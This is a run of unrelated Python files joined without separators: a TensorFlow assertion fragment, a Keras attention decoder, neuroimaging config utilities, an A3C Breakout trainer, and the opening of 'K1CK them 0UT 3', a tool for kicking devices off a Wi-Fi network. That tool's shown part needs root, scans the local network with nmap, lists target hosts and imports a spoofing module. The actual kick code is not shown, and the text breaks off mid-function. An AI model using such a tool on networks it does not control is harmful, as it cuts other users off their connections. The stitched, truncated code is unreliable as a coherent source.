tf.convert_to_tensor(self.paddings) assertions.append(assert_util.assert_greater( paddings, -1, message=msg)) if is_init != (tensor_util.is_ref(self.axis) and tensor_util.is_ref(self.paddings)): axis_ = tf.get_static_value(self.axis) if axis_ is None and axis is None: axis = tf.convert_to_tensor(self.axis) len_axis = ps.size0(ps.reshape( axis if axis_ is None else axis_, shape=-1)) paddings_ = tf.get_static_value(self.paddings) if paddings_ is None and paddings is None: paddings = tf.convert_to_tensor(self.paddings) len_paddings = ps.size0( paddings if paddings_ is None else paddings_) msg = ('Arguments `axis` and `paddings` must have the same number ' 'of elements.') if (ps.is_numpy(len_axis) and ps.is_numpy(len_paddings)): if len_axis != len_paddings: raise ValueError(msg + ' Saw: {}, {}.'.format( self.axis, self.paddings)) elif self.validate_args: assertions.append(assert_util.assert_equal( len_axis, len_paddings, message=msg)) return assertions
import tensorflow as tf from keras import backend as K from keras import regularizers, constraints, initializers, activations from keras.layers.recurrent import Recurrent, _time_distributed_dense from keras.engine import InputSpec def tfPrint(d, T): return tf.Print(input_=T, data=[T, tf.shape(T)], message=d) class AttentionDecoder(Recurrent): def __init__(self, units, output_dim, activation='tanh', return_probabilities=False, name='AttentionDecoder', kernel_initializer='glorot_uniform', recurrent_initializer='orthogonal', bias_initializer='zeros', kernel_regularizer=None, bias_regularizer=None, activity_regularizer=None, kernel_constraint=None, bias_constraint=None, **kwargs): """ Implements an AttentionDecoder that takes in a sequence encoded by an encoder and outputs the decoded states :param units: dimension of the hidden state and the attention matrices :param output_dim: the number of labels in the output space references: Bahdanau, Dzmitry, Kyunghyun Cho, and Yoshua Bengio. "Neural machine translation by jointly learning to align and translate." arXiv preprint arXiv:1409.0473 (2014). """ self.units = units self.output_dim = output_dim self.return_probabilities = return_probabilities self.activation = activations.get(activation) self.kernel_initializer = initializers.get(kernel_initializer) self.recurrent_initializer = initializers.get(recurrent_initializer) self.bias_initializer = initializers.get(bias_initializer) self.kernel_regularizer = regularizers.get(kernel_regularizer) self.recurrent_regularizer = regularizers.get(kernel_regularizer) self.bias_regularizer = regularizers.get(bias_regularizer) self.activity_regularizer = regularizers.get(activity_regularizer) self.kernel_constraint = constraints.get(kernel_constraint) self.recurrent_constraint = constraints.get(kernel_constraint) self.bias_constraint = constraints.get(bias_constraint) super(AttentionDecoder, self).__init__(**kwargs) self.name = name self.return_sequences = True # must return sequences def build(self, input_shape): """ See Appendix 2 of Bahdanau 2014, arXiv:1409.0473 for model details that correspond to the matrices here. """ self.batch_size, self.timesteps, self.input_dim = input_shape if self.stateful: super(AttentionDecoder, self).reset_states() self.states = [None, None] # y, s """ Matrices for creating the context vector """ self.V_a = self.add_weight(shape=(self.units,), name='V_a', initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) self.W_a = self.add_weight(shape=(self.units, self.units), name='W_a', initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) self.U_a = self.add_weight(shape=(self.input_dim, self.units), name='U_a', initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) self.b_a = self.add_weight(shape=(self.units,), name='b_a', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) """ Matrices for the r (reset) gate """ self.C_r = self.add_weight(shape=(self.input_dim, self.units), name='C_r', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.U_r = self.add_weight(shape=(self.units, self.units), name='U_r', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.W_r = self.add_weight(shape=(self.output_dim, self.units), name='W_r', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.b_r = self.add_weight(shape=(self.units, ), name='b_r', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) """ Matrices for the z (update) gate """ self.C_z = self.add_weight(shape=(self.input_dim, self.units), name='C_z', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.U_z = self.add_weight(shape=(self.units, self.units), name='U_z', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.W_z = self.add_weight(shape=(self.output_dim, self.units), name='W_z', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.b_z = self.add_weight(shape=(self.units, ), name='b_z', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) """ Matrices for the proposal """ self.C_p = self.add_weight(shape=(self.input_dim, self.units), name='C_p', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.U_p = self.add_weight(shape=(self.units, self.units), name='U_p', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.W_p = self.add_weight(shape=(self.output_dim, self.units), name='W_p', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.b_p = self.add_weight(shape=(self.units, ), name='b_p', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) """ Matrices for making the final prediction vector """ self.C_o = self.add_weight(shape=(self.input_dim, self.output_dim), name='C_o', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.U_o = self.add_weight(shape=(self.units, self.output_dim), name='U_o', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.W_o = self.add_weight(shape=(self.output_dim, self.output_dim), name='W_o', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.b_o = self.add_weight(shape=(self.output_dim, ), name='b_o', initializer=self.bias_initializer, regularizer=self.bias_regularizer, constraint=self.bias_constraint) # For creating the initial state: self.W_s = self.add_weight(shape=(self.input_dim, self.units), name='W_s', initializer=self.recurrent_initializer, regularizer=self.recurrent_regularizer, constraint=self.recurrent_constraint) self.input_spec = [ InputSpec(shape=(self.batch_size, self.timesteps, self.input_dim))] self.built = True def call(self, x): # store the whole sequence so we can "attend" to it at each timestep self.x_seq = x # apply the a dense layer over the time dimension of the sequence # do it here because it doesn't depend on any previous steps # thefore we can save computation time: self._uxpb = _time_distributed_dense(self.x_seq, self.U_a, b=self.b_a, input_dim=self.input_dim, timesteps=self.timesteps, output_dim=self.units) return super(AttentionDecoder, self).call(x) def get_initial_state(self, inputs): # apply the matrix on the first time step to get the initial s0. s0 = activations.tanh(K.dot(inputs[:, 0], self.W_s)) # from keras.layers.recurrent to initialize a vector of (batchsize, # output_dim) y0 = K.zeros_like(inputs) # (samples, timesteps, input_dims) y0 = K.sum(y0, axis=(1, 2)) # (samples, ) y0 = K.expand_dims(y0) # (samples, 1) y0 = K.tile(y0, [1, self.output_dim]) return [y0, s0] def step(self, x, states): ytm, stm = states # repeat the hidden state to the length of the sequence _stm = K.repeat(stm, self.timesteps) # now multiplty the weight matrix with the repeated hidden state _Wxstm = K.dot(_stm, self.W_a) # calculate the attention probabilities # this relates how much other timesteps contributed to this one. et = K.dot(activations.tanh(_Wxstm + self._uxpb), K.expand_dims(self.V_a)) at = K.exp(et) at_sum = K.sum(at, axis=1) at_sum_repeated = K.repeat(at_sum, self.timesteps) at /= at_sum_repeated # vector of size (batchsize, timesteps, 1) # calculate the context vector context = K.squeeze(K.batch_dot(at, self.x_seq, axes=1), axis=1) # ~~~> calculate new hidden state # first calculate the "r" gate: rt = activations.sigmoid( K.dot(ytm, self.W_r) + K.dot(stm, self.U_r) + K.dot(context, self.C_r) + self.b_r) # now calculate the "z" gate zt = activations.sigmoid( K.dot(ytm, self.W_z) + K.dot(stm, self.U_z) + K.dot(context, self.C_z) + self.b_z) # calculate the proposal hidden state: s_tp = activations.tanh( K.dot(ytm, self.W_p) + K.dot((rt * stm), self.U_p) + K.dot(context, self.C_p) + self.b_p) # new hidden state: st = (1 - zt) * stm + zt * s_tp yt = activations.softmax( K.dot(ytm, self.W_o) + K.dot(stm, self.U_o) + K.dot(context, self.C_o) + self.b_o) if self.return_probabilities: return at, [yt, st] else: return yt, [yt, st] def compute_output_shape(self, input_shape): """ For Keras internal compatability checking """ if self.return_probabilities: return (None, self.timesteps, self.timesteps) else: return (None, self.timesteps, self.output_dim) def get_config(self): """ For rebuilding models on load time. """ config = { 'output_dim': self.output_dim, 'units': self.units, 'return_probabilities': self.return_probabilities } base_config = super(AttentionDecoder, self).get_config() return dict(list(base_config.items()) + list(config.items()))
#!/usr/bin/env python3 """ These functions search the environment for software dependencies and configuration. """ import os import sys import subprocess import logging import pkg_resources import re import glob import ciftify.utils as util def find_workbench(): """ Returns path of the workbench bin/ folder, or None if unavailable. """ try: workbench = util.check_output('which wb_command') workbench = workbench.strip() except: workbench = None return workbench def find_fsl(): """ Returns the path of the fsl bin/ folder, or None if unavailable. """ # Check the FSLDIR environment variable first shell_val = os.getenv('FSLDIR') dir_fsl = os.path.abspath(shell_val) if shell_val else '' if os.path.exists(dir_fsl): return dir_fsl # If the env var method fails, fall back to using which. This method is # not used first because sometimes the executable is installed separately # from the rest of the fsl package, making it hard (or impossible) to locate # fsl data files based on the returned path try: dir_fsl = util.check_output('which fsl') dir_fsl = '/'.join(dir_fsl.split('/')[:-2]) except: dir_fsl = None return dir_fsl def find_freesurfer(): """ Returns the path of the freesurfer bin/ folder, or None if unavailable. """ try: dir_freesurfer = util.check_output('which recon-all') dir_freesurfer = '/'.join(dir_freesurfer.split('/')[:-1]) except: dir_freesurfer = None return dir_freesurfer def find_msm(): try: msm = util.check_output("which msm") msm = msm.replace(os.linesep, '') except: msm = None return msm def msm_version(): ''' Returns version info for msm ''' msm_path = find_msm() if not msm_path: return "MSM not found." try: version = util.check_output('msm --version').replace(os.linesep, '') except: version = '' info = "MSM:{0}Path: {1}{0}Version: {2}".format('{} '.format(os.linesep), msm_path, version) return info def verify_msm_available(): logger = logging.getLogger(__name__) msm = find_msm() if not msm: logger.error("Cannot find \'msm\' binary. Please download and install MSM from " "https://github.com/ecr05/MSM_HOCR_macOSX, or run with the \"--surf_reg FS\" option") sys.exit(1) def find_scene_templates(): """ Returns the hcp scene templates path. If the shell variable HCP_SCENE_TEMPLATES is set, uses that. Otherwise returns the defaults stored in the ciftify/data/scene_templates folder. """ dir_hcp_templates = os.getenv('HCP_SCENE_TEMPLATES') if dir_hcp_templates is None: ciftify_path = os.path.dirname(__file__) dir_hcp_templates = os.path.abspath(os.path.join(find_ciftify_global(), 'scene_templates')) return dir_hcp_templates def find_ciftify_global(): """ Returns the path to ciftify required config and support files. If the shell variable CIFTIFY_DATA is set, uses that. Otherwise returns the defaults stored in the ciftify/data folder. """ logger = logging.getLogger(__name__) dir_templates = os.getenv('CIFTIFY_DATA') if dir_templates is None: ciftify_path = os.path.dirname(__file__) dir_templates = os.path.abspath(os.path.join(ciftify_path, 'data')) else: if not os.path.exists(dir_templates): logger.error("CIFTIFY_DATA enviroment variable is not pointing at a directory that exists") sys.exit(1) return dir_templates def find_HCP_S900_GroupAvg(): """return path to HCP_S900_GroupAvg which should be in ciftify""" s900 = os.path.join(find_ciftify_global(), 'HCP_S900_GroupAvg_v1') return s900 def find_HCP_S1200_GroupAvg(): """return path to HCP_S900_GroupAvg which should be in ciftify""" s1200 = os.path.join(find_ciftify_global(), 'HCP_S1200_GroupAvg_v1') return s1200 def find_freesurfer_data(): """ Returns the freesurfer data path defined in the environment. """ try: dir_freesurfer_data = os.getenv('SUBJECTS_DIR') except: dir_freesurfer_data = None return dir_freesurfer_data def find_work_dir(): """ Returns the ciftify working directory path defined in the environment. """ logger = logging.getLogger(__name__) work_dir = os.getenv('CIFTIFY_WORKDIR') if work_dir is None: work_dir = os.getenv('HCP_DATA') if work_dir is not None: logger.working("Environment variable HCP_DATA has been deprecated. \ Please instead use CIFTIFY_WORKDIR in the future.") else: work_dir = None return work_dir def wb_command_version(): ''' Returns version info about wb_command. Will raise an error if wb_command is not found, since the scripts that use this depend heavily on wb_command and should crash anyway in such an unexpected situation. ''' wb_path = find_workbench() if wb_path is None: raise OSError("wb_command not found. Please check that it is " "installed.") wb_help = util.check_output('wb_command') wb_version = wb_help.split(os.linesep)[0:3] sep = '{} '.format(os.linesep) wb_v = sep.join(wb_version) all_info = 'wb_command:{0}Path: {1}{0}{2}'.format(sep,wb_path,wb_v) return(all_info) def freesurfer_version(): ''' Returns version info for freesurfer ''' fs_path = find_freesurfer() if fs_path is None: raise OSError("Freesurfer cannot be found. Please check that " "it is installed.") try: fs_buildstamp = os.path.join(os.path.dirname(fs_path), 'build-stamp.txt') with open(fs_buildstamp) as text_file: bstamp = text_file.read() except: return "freesurfer build information not found." bstamp = bstamp.replace(os.linesep,'') info = "freesurfer:{0}Path: {1}{0}Build Stamp: {2}".format( '{} '.format(os.linesep),fs_path, bstamp) return info def fsl_version(): ''' Returns version info for FSL ''' fsl_path = find_fsl() if fsl_path is None: raise OSError("FSL not found. Please check that it is " "installed") try: fsl_buildstamp = os.path.join(fsl_path, 'etc', 'fslversion') with open(fsl_buildstamp) as text_file: bstamp = text_file.read() except: return "FSL build information not found." bstamp = bstamp.replace(os.linesep,'') info = "FSL:{0}Path: {1}{0}Version: {2}".format('{} '.format(os.linesep), fsl_path, bstamp) return info def ciftify_version(file_name=None): ''' Returns the path and the latest git commit number and date if working from a git repo, or the version number if working with an installed copy. ''' logger = logging.getLogger(__name__) sep = '{} '.format(os.linesep) try: version = pkg_resources.get_distribution('ciftify').version except pkg_resources.DistributionNotFound: # Ciftify not installed, but a git repo, so return commit info pass else: return "ciftify:{}Version: {}".format(sep, version) try: dir_ciftify = util.check_output('which {}'.format(file_name)) except subprocess.CalledProcessError: file_name = None dir_ciftify = __file__ ciftify_path = os.path.dirname(dir_ciftify) git_log = get_git_log(ciftify_path) if not git_log: logger.error("Something went wrong while retrieving git log. Returning " "ciftify path only.") return "ciftify:{}Path: {}".format(sep, ciftify_path) commit_num, commit_date = read_commit(git_log) info = "ciftify:{0}Path: {1}{0}{2}{0}{3}".format('{} '.format(sep), ciftify_path, commit_num, commit_date) if not file_name: return info ## Try to return the file_name's git commit too, if a file was given file_log = get_git_log(ciftify_path, file_name) if not file_log: # File commit info not found return info commit_num, commit_date = read_commit(file_log) info = "{1}{5}Last commit for {2}:{0}{3}{0}{4}".format('{} '.format( os.linesep), info, file_name, commit_num, commit_date, os.linesep) return info def get_git_log(git_dir, file_name=None): git_cmd = ["cd {}; git log".format(git_dir)] if file_name: git_cmd.append("--follow {}".format(file_name)) git_cmd.append("| head") git_cmd = " ".join(git_cmd) # Silence stderr try: with open(os.devnull, 'w') as DEVNULL: file_log = util.check_output(git_cmd, stderr=DEVNULL) except subprocess.CalledProcessError: # Fail safe in git command returns non-zero value logger = logging.getLogger(__name__) logger.error("Unrecognized command: {} " "\nReturning empty git log.".format(git_cmd)) file_log = "" return file_log def read_commit(git_log): commit_num = git_log.split(os.linesep)[0] commit_num = commit_num.replace('commit', 'Commit:') commit_date = git_log.split(os.linesep)[2] return commit_num, commit_date def system_info(): ''' return formatted version of the system info''' sys_info = os.uname() sep = '{} '.format(os.linesep) info = "System Info:{0}OS: {1}{0}Hostname: {2}{0}Release: {3}{0}Version: " \ "{4}{0}Machine: {5}".format( sep, sys_info[0], sys_info[1], sys_info[2], sys_info[3], sys_info[4]) return info class FSLog: _MAYBE_HALTED = "FS may not have finished running." _ERROR = "Exited with error." def __init__(self, freesurfer_folder): logger = logging.getLogger(__name__) self._path = freesurfer_folder fs_scripts = os.path.join(freesurfer_folder, 'scripts') self.status = self._get_status(fs_scripts) self.build = self._get_build(os.path.join(fs_scripts, 'build-stamp.txt')) self.version = self.get_version(self.build) try: recon_contents = self.parse_recon_done(os.path.join(fs_scripts, 'recon-all.done')) except: logger.warning('Failed to parse the scripts/recon-all.done log') recon_contents = {} self.subject = self.get_subject(recon_contents.get('SUBJECT', '')) self.start = self.get_date(recon_contents.get('START_TIME', '')) self.end = self.get_date(recon_contents.get('END_TIME', '')) self.kernel = self.get_kernel(recon_contents.get('UNAME', '')) self.cmdargs = self.get_cmdargs(recon_contents.get('CMDARGS','')) self.args = self.get_args(recon_contents.get('CMDARGS', '')) self.nii_inputs = self.get_niftis(recon_contents.get('CMDARGS', '')) def read_log(self, path): try: with open(path) as log: contents = log.readlines() except OSError: return [] return contents def _get_status(self, scripts): error_log = os.path.join(scripts, 'recon-all.error') regex = os.path.join(scripts, '*') run_logs = [item for item in glob.glob(regex) if 'IsRunning' in item] recon_log = os.path.join(scripts, 'recon-all.done') if run_logs: status = self._MAYBE_HALTED elif os.path.exists(error_log): status = self._ERROR elif os.path.exists(recon_log): status = '' else: raise Exception("No freesurfer log files found for " "{}".format(scripts)) return status def _get_build(self, build_stamp): contents = self.read_log(build_stamp) if not contents: return '' return contents[0].strip('\n') def get_version(self, build): if 'v6.0.0' in build: return 'v6.0.0' if 'v5.3.0' in build: return 'v5.3.0' if 'v5.1.0' in build: return 'v5.1.0' else: return 'unknown' def parse_recon_done(self, recon_done): recon_contents = self.read_log(recon_done) if len(recon_contents) < 2: # If length is less than two, log is malformed and will cause a # crash when the for loop is reached below return {} parsed_contents = {} # Skip first line, which is just a bunch of dashes for line in recon_contents[1:]: # line = line.decode('utf-8') fields = line.strip('\n').split(None, 1) parsed_contents[fields[0]] = fields[1] return parsed_contents def get_subject(self, subject_field): if subject_field: return subject_field subject = os.path.basename(self._path) return subject def get_date(self, date_str): if not date_str: return '' # return datetime.datetime.strptime(date_str, '%a %b %d %X %Z %Y') return date_str def get_kernel(self, log_uname): if not log_uname: return '' return log_uname.split()[2] def get_cmdargs(self, cmd_args): if not cmd_args: return '' return cmd_args @staticmethod def get_args(cmd_args): if not cmd_args: return '' cmd_pieces = re.split(r'^-|\s-', cmd_args) args = cmd_pieces for item in ['i ', 'T2 ', 'subjid ']: args = filter(lambda x: not x.startswith(item), args) str_args = ' -'.join(sorted(args)) return str_args.strip() @staticmethod def get_niftis(cmd_args): if not cmd_args: return '' # Will break on paths containing white space nifti_inputs = re.findall(r'-i\s*\S*|-T2\s*\S*', cmd_args) niftis = [item.strip('-i').strip('-T2').strip() for item in nifti_inputs] return '; '.join(niftis)
#!/usr/bin/env python from skimage.transform import resize from skimage.color import rgb2gray import threading import tensorflow as tf import sys import random import numpy as np import time import gym from keras import backend as K from keras.layers import Convolution2D, Flatten, Dense from collections import deque from a3c_model import build_policy_and_value_networks from keras import backend as K from atari_environment import AtariEnvironment # Path params EXPERIMENT_NAME = "breakout_a3c" SUMMARY_SAVE_PATH = "/Users/coreylynch/dev/async-rl/summaries/"+EXPERIMENT_NAME CHECKPOINT_SAVE_PATH = "/tmp/"+EXPERIMENT_NAME+".ckpt" CHECKPOINT_NAME = "/tmp/breakout_a3c.ckpt-5" CHECKPOINT_INTERVAL=5000 SUMMARY_INTERVAL=5 # TRAINING = False TRAINING = True SHOW_TRAINING = True # SHOW_TRAINING = False # Experiment params GAME = "Breakout-v0" ACTIONS = 3 NUM_CONCURRENT = 8 NUM_EPISODES = 20000 AGENT_HISTORY_LENGTH = 4 RESIZED_WIDTH = 84 RESIZED_HEIGHT = 84 # DQN Params GAMMA = 0.99 # Optimization Params LEARNING_RATE = 0.00001 #Shared global parameters T = 0 TMAX = 80000000 t_max = 32 def sample_policy_action(num_actions, probs): """ Sample an action from an action probability distribution output by the policy network. """ # Subtract a tiny value from probabilities in order to avoid # "ValueError: sum(pvals[:-1]) > 1.0" in numpy.multinomial probs = probs - np.finfo(np.float32).epsneg histogram = np.random.multinomial(1, probs) action_index = int(np.nonzero(histogram)[0]) return action_index def actor_learner_thread(num, env, session, graph_ops, summary_ops, saver): # We use global shared counter T, and TMAX constant global TMAX, T # Unpack graph ops s, a, R, minimize, p_network, v_network = graph_ops # Unpack tensorboard summary stuff r_summary_placeholder, update_ep_reward, val_summary_placeholder, update_ep_val, summary_op = summary_ops # Wrap env with AtariEnvironment helper class env = AtariEnvironment(gym_env=env, resized_width=RESIZED_WIDTH, resized_height=RESIZED_HEIGHT, agent_history_length=AGENT_HISTORY_LENGTH) time.sleep(5*num) # Set up per-episode counters ep_reward = 0 ep_avg_v = 0 v_steps = 0 ep_t = 0 probs_summary_t = 0 s_t = env.get_initial_state() terminal = False while T < TMAX: s_batch = [] past_rewards = [] a_batch = [] t = 0 t_start = t while not (terminal or ((t - t_start) == t_max)): # Perform action a_t according to policy pi(a_t | s_t) probs = session.run(p_network, feed_dict={s: [s_t]})[0] action_index = sample_policy_action(ACTIONS, probs) a_t = np.zeros([ACTIONS]) a_t[action_index] = 1 if probs_summary_t % 100 == 0: print "P, ", np.max(probs), "V ", session.run(v_network, feed_dict={s: [s_t]})[0][0] s_batch.append(s_t) a_batch.append(a_t) s_t1, r_t, terminal, info = env.step(action_index) ep_reward += r_t r_t = np.clip(r_t, -1, 1) past_rewards.append(r_t) t += 1 T += 1 ep_t += 1 probs_summary_t += 1 s_t = s_t1 if terminal: R_t = 0 else: R_t = session.run(v_network, feed_dict={s: [s_t]})[0][0] # Bootstrap from last state R_batch = np.zeros(t) for i in reversed(range(t_start, t)): R_t = past_rewards[i] + GAMMA * R_t R_batch[i] = R_t session.run(minimize, feed_dict={R : R_batch, a : a_batch, s : s_batch}) # Save progress every 5000 iterations if T % CHECKPOINT_INTERVAL == 0: saver.save(session, CHECKPOINT_SAVE_PATH, global_step = T) if terminal: # Episode ended, collect stats and reset game session.run(update_ep_reward, feed_dict={r_summary_placeholder: ep_reward}) print "THREAD:", num, "/ TIME", T, "/ REWARD", ep_reward s_t = env.get_initial_state() terminal = False # Reset per-episode counters ep_reward = 0 ep_t = 0 def build_graph(): # Create shared global policy and value networks s, p_network, v_network, p_params, v_params = build_policy_and_value_networks(num_actions=ACTIONS, agent_history_length=AGENT_HISTORY_LENGTH, resized_width=RESIZED_WIDTH, resized_height=RESIZED_HEIGHT) # Shared global optimizer optimizer = tf.train.AdamOptimizer(LEARNING_RATE) # Op for applying remote gradients R_t = tf.placeholder("float", [None]) a_t = tf.placeholder("float", [None, ACTIONS]) log_prob = tf.log(tf.reduce_sum(p_network * a_t, reduction_indices=1)) p_loss = -log_prob * (R_t - v_network) v_loss = tf.reduce_mean(tf.square(R_t - v_network)) total_loss = p_loss + (0.5 * v_loss) minimize = optimizer.minimize(total_loss) return s, a_t, R_t, minimize, p_network, v_network # Set up some episode summary ops to visualize on tensorboard. def setup_summaries(): episode_reward = tf.Variable(0.) tf.summary.scalar("Episode Reward", episode_reward) r_summary_placeholder = tf.placeholder("float") update_ep_reward = episode_reward.assign(r_summary_placeholder) ep_avg_v = tf.Variable(0.) tf.summary.scalar("Episode Value", ep_avg_v) val_summary_placeholder = tf.placeholder("float") update_ep_val = ep_avg_v.assign(val_summary_placeholder) summary_op = tf.summary.merge_all() return r_summary_placeholder, update_ep_reward, val_summary_placeholder, update_ep_val, summary_op def train(session, graph_ops, saver): # Set up game environments (one per thread) envs = [gym.make(GAME) for i in range(NUM_CONCURRENT)] summary_ops = setup_summaries() summary_op = summary_ops[-1] # Initialize variables session.run(tf.global_variables_initializer()) writer = tf.summary.FileWriter(SUMMARY_SAVE_PATH, session.graph) # Start NUM_CONCURRENT training threads actor_learner_threads = [threading.Thread(target=actor_learner_thread, args=(thread_id, envs[thread_id], session, graph_ops, summary_ops, saver)) for thread_id in range(NUM_CONCURRENT)] for t in actor_learner_threads: t.start() # Show the agents training and write summary statistics last_summary_time = 0 while True: if SHOW_TRAINING: for env in envs: env.render() now = time.time() if now - last_summary_time > SUMMARY_INTERVAL: summary_str = session.run(summary_op) writer.add_summary(summary_str, float(T)) last_summary_time = now for t in actor_learner_threads: t.join() def evaluation(session, graph_ops, saver): saver.restore(session, CHECKPOINT_NAME) print "Restored model weights from ", CHECKPOINT_NAME monitor_env = gym.make(GAME) monitor_env.monitor.start('/tmp/'+EXPERIMENT_NAME+"/eval") # Unpack graph ops s, a_t, R_t, minimize, p_network, v_network = graph_ops # Wrap env with AtariEnvironment helper class env = AtariEnvironment(gym_env=monitor_env, resized_width=RESIZED_WIDTH, resized_height=RESIZED_HEIGHT, agent_history_length=AGENT_HISTORY_LENGTH) for i_episode in xrange(100): s_t = env.get_initial_state() ep_reward = 0 terminal = False while not terminal: monitor_env.render() # Forward the deep q network, get Q(s,a) values probs = p_network.eval(session = session, feed_dict = {s : [s_t]})[0] action_index = sample_policy_action(ACTIONS, probs) s_t1, r_t, terminal, info = env.step(action_index) s_t = s_t1 ep_reward += r_t print ep_reward monitor_env.monitor.close() def main(_): g = tf.Graph() with g.as_default(), tf.Session() as session: K.set_session(session) graph_ops = build_graph() saver = tf.train.Saver() if TRAINING: train(session, graph_ops, saver) else: evaluation(session, graph_ops, saver) if __name__ == "__main__": tf.app.run()
#!/usr/bin/env python3 import time import os import sys import math import logging import platform from time import sleep from datetime import timedelta from ipaddress import IPv4Address import requests import R_spoof BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy! try: from scapy.all import * import nmap except ImportError: print("\n{0}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.".format(RED)) print("\n{0}If you still cannot resolve this error, please submit an issue here:\n\t{1}https://github.com/R3DDY97/K1CK_them_0UT3/issues\n{2}".format(RED, BLUE, END)) raise SystemExit # check whether user is root if os.geteuid() != 0: print("\n{0}ERROR: K1CKThemOut3 must be run with root privileges. Try again with sudo:\n\t{1}$ sudo python3 kick.py{2}\n".format(RED, GREEN, END)) raise SystemExit def heading(): spaces = " " * 70 sys.stdout.write(RED + spaces + """ KK KK IIIII CCCCC KK KK tt hh KK KK III CC C KK KK tt hh eee mm mm mmmm KKKK III CC KKKK tttt hhhhhh ee e mmm mm mm KK KK III CC C KK KK tt hh hh eeeee mmm mm mm KK KK IIIII CCCCC KK KK tttt hh hh eeeee mmm mm mm OOOOO UU UU TTTTTTT 333333 OO OO UU UU TTT 3333 OO OO UU UU TTT _____ 3333 OO OO UU UU TTT 333 OOOO0 UUUUU TTT 333333 """ + END + BLUE + '\n' + '{0}K1CK devices accesing your Wifi ({1}K1CK TH3M 0UT 3{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(98) + '\n' + 'Made With <3 by: {0}CH1TT1{3}'.format(YELLOW, RED, YELLOW, BLUE).center(111) + '\n' + 'Version: {0}0.2{1}\n'.format(YELLOW, END).center(86)) def optionBanner(): print('\n\tChoose option from menu:\n') sleep(0.2) print('\t\t{0}[{1}1{2}]{3} K1CK ONE Off'.format( YELLOW, RED, YELLOW, WHITE)) sleep(0.2) print('\t\t{0}[{1}2{2}]{3} K1CK SOME Off'.format( YELLOW, RED, YELLOW, WHITE)) sleep(0.2) print('\t\t{0}[{1}3{2}]{3} K1CK ALL Off'.format( YELLOW, RED, YELLOW, WHITE)) sleep(0.2) print( '\n\t\t{0}[{1}E{2}]{3} Exit K1CK-Them-0UT\n'.format(YELLOW, RED, YELLOW, WHITE)) def vendorMAC(mac): url = "http://api.macvendors.com/{}".format(mac) response = requests.get(url) if response.ok: return response.text return "NA" def get_broadcast(gatewayIP): *head, tail = gatewayIP.split('.') head.append(str(int(tail) - 1)) gateway = ".".join(head) route_list = [i.split() for i in str(conf.route).splitlines()] for route in route_list: if route[0] == gateway: return route[1] def get_netmask(gateway): routing = scapy.config.conf.route.routes for i in routing: if int(IPv4Address(gateway)) in i: netmask = 32 - int(round(math.log(0xFFFFFFFF - (i[1]), 2))) return netmask def net_config(): global defaultInterface global defaultGatewayIP global defaultInterfaceIP global defaultInterfaceMAC global defaultGatewayMac global GatewayInterface defaultInterface = conf.iface defaultInterfaceIP = get_if_addr(defaultInterface) defaultInterfaceMAC = get_if_hwaddr(defaultInterface).upper() # routing = scapy.config.conf.route.routes # defaultGatewayIP = route_list[2][2] # defaultInterface, defaultInterfaceIP, defaultGatewayIP = conf.route.route("0.0.0.0")[2] defaultGatewayIP = conf.route.route("0.0.0.0")[2] defaultGatewayMac = getmacbyip(defaultGatewayIP).upper() broadcast = get_broadcast(defaultGatewayIP) netmask = get_netmask(broadcast) GatewayInterface = "{}/{}".format(defaultGatewayIP, netmask) def scanNetwork(): nm = nmap.PortScanner() scanDict = nm.scan(hosts=GatewayInterface, arguments='-sn') scan_data = scanDict['scan'] scan_stats = scanDict['nmap']['scanstats'] IPlist = [ip for ip in scan_data.keys() if ip not in [defaultGatewayIP, defaultInterfaceIP]] scan_stats['targets'] = len(IPlist) hosts_list = [] for host in IPlist: host_dict = {"ip": host} mac = scan_data[host]['addresses']['mac'] host_dict['vendor'] = scan_data[host]['vendor'].get(mac, '') host_dict['mac'] = mac hosts_list.append(host_dict) print_metadata(scan_stats) return hosts_list def print_metadata(scan_stats): elapsed_time = float(scan_stats["elapsed"]) uphosts = int(scan_stats["uphosts"]) timestr = scan_stats["timestr"] targets = scan_stats["targets"] print('''\n\t{}N3TW0RK scan summary :-\n{} Scan runtime : {}{}{} Interface : {}{}{} MAC : {}{}{} Gateway IP : {}{}{} uphosts : {}{}{} Target hosts : {}{}{}\n '''.format(YELLOW, WHITE, RED, elapsed_time, WHITE, RED, defaultInterface, WHITE, RED, defaultGatewayMac, WHITE, RED, defaultGatewayIP, WHITE, RED, uphosts, WHITE, RED, targets, END)) def print_hosts(hosts_list): print("{0}\tNo\t{1}IP ADDRESS\t {2}MAC ADDRESS\t\t{3}VENDOR NAME{4}\n".format(YELLOW, WHITE, RED, GREEN, END)) for n, host in enumerate(hosts_list, 1): 